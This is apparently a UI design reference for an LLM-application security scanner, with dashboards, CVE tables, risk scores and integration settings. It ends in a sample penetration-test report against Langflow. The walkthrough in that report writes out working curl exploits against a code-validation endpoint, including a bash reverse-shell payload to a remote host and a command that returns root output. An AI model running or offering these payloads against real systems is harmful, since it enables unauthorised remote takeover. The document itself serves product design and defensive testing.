Sentinel — UI Design Reference (All Screens)

Total Scans

LLM apps analysed

↑ 12 this month

CVEs Found

347

Across all components

183 proprietary

Critical Issues

Requiring action now

↑ 3 since last scan

Components

2,681

Dependencies mapped

100% parse rate

Recent Scans

Last 7 days

🤖

LangChain-RAG-Pipeline v2.1.4

SCA + Pen Test · 2h ago · 312 components

Critical

🔗

LlamaIndex-Enterprise v0.9.2

SCA · Yesterday · 187 components

High

⚡

OpenAI Agents SDK v1.2.0

SCA + Pen Test · 2 days ago · 94 components

High

🛠️

api4.ai2wj.com (OWASP Juice Shop)

Full Pen Test · 3 days ago · 1 Apr

Medium

🌐

AutoGPT v0.5.1

SCA · 5 days ago · 241 components

Low

Ecosystem Risk

Overall Risk Score

Critical

High

112

Medium

144

Low

Activity

Critical CVE in langchain-core 0.1.5 — CVE-2024-3095 (CVSS 9.1)

2 hours ago

Pen test on api4.ai2wj.com — 14 exploits confirmed

1 day ago

New proprietary CVE added — LlamaIndex injection vector

2 days ago

AutoGPT v0.5.1 — 241 components parsed, 0 false positives

5 days ago

Scan an LLM Application

Paste a repository URL or upload a project folder. Sentinel will map all components, detect CVEs, and run automated pen testing.

✓

Target

Scan Type

Run & Report

Application Target

or upload project folder

Drag & drop your project folder, or browse

Select Scan Type

🔬

SCA Scan

Map all LLM components, detect CVEs, 0% false positive

⚔️

Pen Test

Automated agentic pen testing, 660 exploitation tasks

📊

Risk Score

Component-level scoring beyond CVSS for insurance & compliance

Severity Threshold

Report Format

Scan History

48 total

🤖

LangChain-RAG-Pipeline v2.1.4

SCA + Pen Test · 312 components · 6 Apr 2026 14:32

Critical

🔗

LlamaIndex-Enterprise v0.9.2

SCA · 187 components · 5 Apr 2026 09:14

High

⚡

OpenAI Agents SDK v1.2.0

SCA + Pen Test · 94 components · 4 Apr 2026 16:50

High

🛠️

api4.ai2wj.com (OWASP Juice Shop)

Full Pen Test · 1 Apr 2026 · Template report

Medium

🌐

AutoGPT v0.5.1

SCA · 241 components · 1 Apr 2026 11:05

Low

LangChain-RAG-Pipeline v2.1.4

github.com/example-org/langchain-rag-pipeline · SCA + Pen Test · 312 components · 11m 24s

LangChain 0.1.5LlamaIndex 0.9.2OpenAI SDKPython 3.115 Critical CVEs

🔍

CVEs (5 proprietary)

🧩

312

Components (100% parse)

⚔️

Exploits confirmed

CVE Findings

Sorted by severity

CVE ID	Component	Severity	CVSS	Status
CVE-2024-3095	langchain-core 0.1.5	Critical	9.1	Unpatched
⬛ PROP-0047	llama-index 0.9.2	Critical	8.8	No public PoC
CVE-2024-1876	transformers 4.36.0	High	7.5	Patch available
CVE-2023-9182	openai 1.6.1	High	7.2	Patch available
⬛ PROP-0031	faiss-cpu 1.7.4	Medium	5.1	No public PoC

⬛ Proprietary CVE — detected only by Sentinel, not in NVD/OSV · Showing 5 of 47

Component Risk

Top contributors

langchain-core

0.1.5

llama-index

0.9.2

transformers

4.36.0

openai

1.6.1

Pen Test Summary

Exploits confirmed

Attack objectives

✅ Non-lateral — zero collateral impact

✅ Response-adaptive exploit strategy

⚠️ Prompt injection chain: 3 paths found

LangChain-RAG-Pipeline v2.1.4

SCA Risk Score · 47 vulnerabilities across 312 components · Python 3.11 ecosystem

langchain-core 0.1.5 llama-index 0.9.2 transformers 4.36.0 openai 1.6.1 100% parse rate ⬛ 5 proprietary CVEs

Input files

requirements.txt

pyproject.toml

48 direct · 264 transitive

Total CVEs

Critical

High

Medium

Loading architecture…

Architecture Details

Click a component in the graph

← Click a component in the graph

Filter:

Showing all

	CVE / ID	Component	Ecosystem	Severity	CVSS	Fix Available	PoC
Loading vulnerabilities…

View in other tools:

Dependency Tree

312 components

langchain-core 0.1.5

2 Critical CVEs · risk 95

langchain-community 0.0.24

1 High CVE

pydantic 2.4.2

1 Medium CVE

anyio 3.7.1

No CVEs found

llama-index 0.9.2

1 Critical (Prop) · risk 82

openai 1.6.1

1 High CVE

tiktoken 0.5.2

No CVEs found

transformers 4.36.0

1 High CVE · risk 75

tokenizers 0.15.0

No CVEs found

safetensors 0.4.1

No CVEs found

Interactive D3 graph — connect to component API for full tree

● Critical ● High ● Medium ● Low / Clean

🏗️ Placeholder — connect to CVE library API (llmscapi.wj2ai.com) for live database

Total CVEs

2,847

NVD + OSV + Proprietary

Proprietary

183

Lab-only, no public PoC

LLM-Specific

341

LangChain, LlamaIndex, etc.

Added This Month

New entries Apr 2026

CVE Library

2,847 entries

CVE ID	Component	Type	Severity	CVSS	Source	Added
⬛ PROP-0047	llama-index 0.9.x	Prompt Injection	Critical	8.8	Proprietary	2 Apr 2026
CVE-2024-3095	langchain-core 0.1.x	Code Exec	Critical	9.1	NVD	Mar 2024
⬛ PROP-0031	faiss-cpu 1.7.x	Memory Corruption	Medium	5.1	Proprietary	28 Mar 2026
CVE-2024-1876	transformers 4.36.x	Deserialization	High	7.5	NVD	Jan 2024
⬛ PROP-0019	langchain-community	Tool Injection	High	7.0	Proprietary	15 Mar 2026
CVE-2023-9182	openai 1.6.x	Auth Bypass	High	7.2	NVD	Dec 2023

Showing 6 of 2,847 · ⬛ = Proprietary (lab-only) · Load more →

🏗️ Placeholder — connect to Yongchi's risk scoring API for live component scores

Score Breakdown by Factor

CVE Severity

Weighted CVSS scores across all components, adjusted for exploitability and impact scope.

Dependency Depth

Transitive dependency chain length. Deeper chains increase attack surface and reduce patch visibility.

Exploit Availability

Whether working exploits exist (public PoC, Metasploit module, or Sentinel proprietary exploit).

Patch Availability

Proportion of CVEs with no available patch. Unpatched CVEs receive higher weighting.

Overall Score

/ 100 · Critical Risk

📌 38 pts from CVE severity

📌 22 pts from dep. depth

📌 18 pts from exploit avail.

📌 8 pts from no patches

Insurance Input

Frequency proxy: 312 components

Severity distribution: 5C / 12H / 18M / 12L

Avg CVSS: 6.8

Proprietary CVE exposure: 5 CVEs

For NTU actuarial model · Prof Zhu Wenjun

Component-Level Scores (top 10)

Component	Version	CVE Count	Dep. Depth	Has Exploit	Patched	Score
langchain-core	0.1.5	4	3	Yes	No	95
llama-index	0.9.2	2	2	Partial	No	82
transformers	4.36.0	2	4	No	Yes	75
openai	1.6.1	1	2	No	Yes	60
faiss-cpu	1.7.4	1	1	Partial	No	45

🏗️ Placeholder — connect OAuth flows and webhook endpoints for each integration

Platform Connectors

🐙

GitHub

Auto-trigger SCA scans on pull requests. Post risk scores as PR checks. Supports GitHub Actions.

Connected — example-org

🔵

Jira

Create Jira tickets automatically for Critical and High CVEs. Assign to the right team based on component ownership.

Not connected

💬

Slack

Send real-time alerts to your security channel when new Critical CVEs are detected or pen test completes.

Connected — #security-alerts

🔶

GitLab

CI/CD pipeline integration. Block deployments when risk score exceeds threshold. Supports GitLab CI.

Not connected

📊

Splunk / SIEM

Forward scan results and CVE alerts to your SIEM via syslog or HTTP Event Collector (HEC).

Not connected

☁️

AWS / Azure

Scan container images and Lambda functions. Integrates with ECR, ACR, and cloud-native registries.

Not connected

API Keys

Production — DSO Integration

sk-sent-••••••••••••••••••••••3a9f

Staging — Internal Testing

sk-sent-••••••••••••••••••••••7c2d

🏗️ Placeholder — connect to rules engine API; toggles should write to config store

Scan Rules

Auto-scan on new dependency

Trigger SCA scan when requirements.txt or pyproject.toml changes

Block deploy on Critical CVE

Fail CI/CD pipeline if any Critical CVE is detected without a patch

Include proprietary CVE library

Use Sentinel's 183 proprietary CVEs in addition to NVD/OSV

Non-lateral pen test mode

Restrict pen test to no lateral movement — required for government clients

Auto-create Jira tickets

Create tickets for Critical and High CVEs after each scan

Scheduled weekly scan

Automatically re-scan all registered applications every Monday 02:00 SGT

Compliance Framework

Singapore CSA Cybersecurity Framework

Map findings to CSA guidelines for government reporting

MAS TRMG Alignment

Tag CVEs relevant to MAS Technology Risk Management Guidelines

PDPA Data Risk Tagging

Flag components that process personal data under Singapore PDPA

OWASP LLM Top 10

Align pen test findings to OWASP LLM Top 10 taxonomy

Severity Thresholds

⬤ Critical threshold (CVSS min)

⬤ High threshold (CVSS min)

⬤ Medium threshold (CVSS min)

⬤ Low threshold (CVSS min)

Risk score alert threshold

Max false positive tolerance (%)

Custom Severity Labels

Map Sentinel severity levels to your organisation's internal classification. Exported reports will use your labels.

Report Defaults

Include executive summary

Add a non-technical one-page summary to every PDF report

Include remediation steps

Add patch guidance and recommended actions for each CVE

Export JSON alongside PDF

Always generate machine-readable JSON report for SIEM ingestion

▶ Live Demo

📘 Summary Report

Info Collection

Weakness Gathering

Filtering

Attack Planning

Exploitation

Attack Pipeline

✓

Info Collection

✓

Weakness Gathering

✓

Filtering

✓

Attack Planning

✓

Exploitation

Target

Langflow

v1.2.0 · Uvicorn/React

CVEs Tested

3 filtered for exploit

Exploited

CVE-2025-3248 · CVE-2025-57760

Outcome

Root Access

uid=0 confirmed

I. Executive Summary

This automated penetration test targeted Langflow Workflow Platform v1.2.0, using the Sentinel LLM agent pipeline to simulate real-world attacks. The engagement covered reconnaissance, CVE discovery, exploit generation, and privilege escalation — resulting in confirmed root access to the target system.

II. Target Overview

ApplicationLangflow Workflow Platform v1.2.0
FrameworkReact + Uvicorn (Python)
Server43.156.238.180:7860
Key Endpoints/login · /api/v1/validate/code · /flow
Scan ModeNon-lateral · Zero collateral impact

III. Vulnerability Summary

CVE ID	Component	Type	Severity	Status
CVE-2025-3248	Langflow Core	Unauthenticated RCE	Critical	Exploited ✓
CVE-2025-57760	Langflow CLI	Privilege Escalation	High	Exploited ✓
CVE-2025-68155	React	XSS	High	Failed — patched

IV. Exploitation Walkthrough

🔍 Initial Reconnaissance

System detected: Langflow Workflow Platform v1.2.0
Live API discovered: /api/v1/validate/code
Auth endpoint: /login (JWT-based)

🎯 Exploit 1 — Privilege Escalation via CVE-2025-57760

A privilege escalation vulnerability in Langflow containers allows an authenticated user with RCE access to invoke the internal CLI to create a new superuser. This bypasses the UI registration flow, granting full admin access.

$ curl -X POST http://43.156.238.180:7860/api/v1/validate/code \ -H "Content-Type: application/json" \ -d '{ "code": "def foo(p=__import__(os).system(bash -i >& /dev/tcp/192.168.1.22/4444)):\n pass" }' $ /app/.venv/bin/langflow superuser Username: test | Password: test123456 Default folder created successfully. Superuser created successfully. HTTP/1.1 200 OK → is_superuser: true

🚀 Exploit 2 — Unauthenticated RCE via CVE-2025-3248

A remote, unauthenticated attacker can send crafted HTTP requests to the code validation endpoint to execute arbitrary system commands — without any login required.

$ curl -X POST http://43.156.238.180:7860/api/v1/validate/code \ -H "Content-Type: application/json" \ -d '{ "code": "@exec(raise Exception(subprocess.check_output([id])))\ndef foo():\n pass" }' HTTP/1.1 200 OK { "function": { "errors": [ "uid=0(root) gid=0(root) groups=0(root)" ] } }

V. Findings & Recommendations

✅ Finding

CVE-2025-57760 enables remote attackers to create a new administrative user via internal CLI abuse. CVE-2025-3248 enables remote, unauthenticated attackers to execute arbitrary system commands including root-level account modifications.

🚨 Impact

Full system compromise achieved. Attacker obtained administrator privileges in the application and root shell access via unauthenticated remote command injection. All data on the host is at risk.

🛠️ Recommendations

↑ Upgrade Langflow to a patched version immediately
🔒 Restrict access to /api/v1/validate/code — require auth + IP allowlist
🛡️ Introduce strict input sandboxing / code execution isolation
🔑 Deploy API authentication and rate-limiting on all endpoints
📊 Conduct continuous security regression testing with Sentinel